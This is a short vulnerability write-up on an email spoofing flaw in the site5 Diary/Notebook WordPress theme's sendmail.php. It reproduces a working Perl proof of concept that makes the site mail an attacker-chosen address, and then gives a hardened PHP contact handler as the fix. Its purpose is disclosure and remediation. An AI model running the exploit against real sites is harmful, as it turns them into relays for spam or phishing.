The Diary/Notebook theme for WordPress is a personal diary blog theme designed by site5. An email spoofing vulnerability in it was disclosed recently: the theme's `sendmail.php` accepts the recipient address from the client (hex-encoded in the `receiver` field), so anyone can make the site send mail to an arbitrary address. The published Perl proof of concept is attached:

```perl
#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 WordPress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Version: Not Documented
# Tested on: Linux 3.2

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw{ POST };

# Change this to the root of the WordPress install
my $wordpress = 'http://localhost/wordpress/';
my $url = $wordpress . 'wp-content/themes/diary/sendmail.php';

# Name shows up in the subject of the email ("Website contact message from <name>")
my $name = 'Proof of Concept';
# Sender email address
my $email = 'sender@mail.com';
# Content of the email
my $comment = 'Email content';
# Receiver email address; the theme expects it hex-encoded, one byte per two hex digits
my $receiver = 'receiver@mail.com';
$receiver =~ s/(.)/sprintf("%x", ord($1))/eg;

my $ua = LWP::UserAgent->new();
my $request = POST(
    $url,
    [
        name     => $name,
        email    => $email,
        comment  => $comment,
        receiver => $receiver,
        submit   => 'submit',
    ]
);

print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \@BallastSec on Twitter\n";
```

Author: 牛X阿德玛
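The root cause above is that the handler trusts a client-supplied recipient. As an added example (not the theme's or the exploit author's code), this is a hardened stand-in for a handler like `sendmail.php`: the recipient is fixed server-side, the posted `receiver` field is simply ignored, and the visitor's address is validated before it reaches a mail header. The addresses `owner@example.com` and `noreply@example.com` are placeholders.

```php
<?php
// Added example: hardened contact-form handler. Recipient lives in server
// config, never in the request (placeholder addresses).
const CONTACT_RECIPIENT = 'owner@example.com';
const SITE_SENDER       = 'noreply@example.com';

// Builds the mail parameters from the POSTed form, or returns null if the
// submission is invalid. Only name, email and comment are read; a posted
// "receiver" value has no effect.
function build_contact_mail(array $post): ?array {
    $name    = trim($post['name']    ?? '');
    $email   = trim($post['email']   ?? '');
    $comment = trim($post['comment'] ?? '');

    if ($name === '' || $comment === '') {
        return null;
    }
    // A single syntactically valid address; this also rejects CR/LF, which
    // would otherwise let the visitor inject extra mail headers.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // The name goes into the Subject header, so strip line breaks and cap it.
    $name = substr(preg_replace('/[\r\n]+/', ' ', $name), 0, 100);

    // The visitor's address is Reply-To, not From: the site never sends mail
    // claiming to be from an outside domain, so SPF/DKIM for the site stay valid.
    $headers = [
        'From: ' . SITE_SENDER,
        'Reply-To: ' . $email,
        'Content-Type: text/plain; charset=UTF-8',
    ];
    return [
        'to'      => CONTACT_RECIPIENT,
        'subject' => 'Website contact message from ' . $name,
        'body'    => $comment,
        'headers' => implode("\r\n", $headers),
    ];
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $mail = build_contact_mail($_POST);
    if ($mail === null) {
        http_response_code(400);
        exit('Invalid contact form submission.');
    }
    mail($mail['to'], $mail['subject'], $mail['body'], $mail['headers']);
    echo 'Message sent.';
}
```

With this handler the proof of concept above still gets an HTTP 200, but the message goes to `CONTACT_RECIPIENT` rather than to whatever the `receiver` field decodes to.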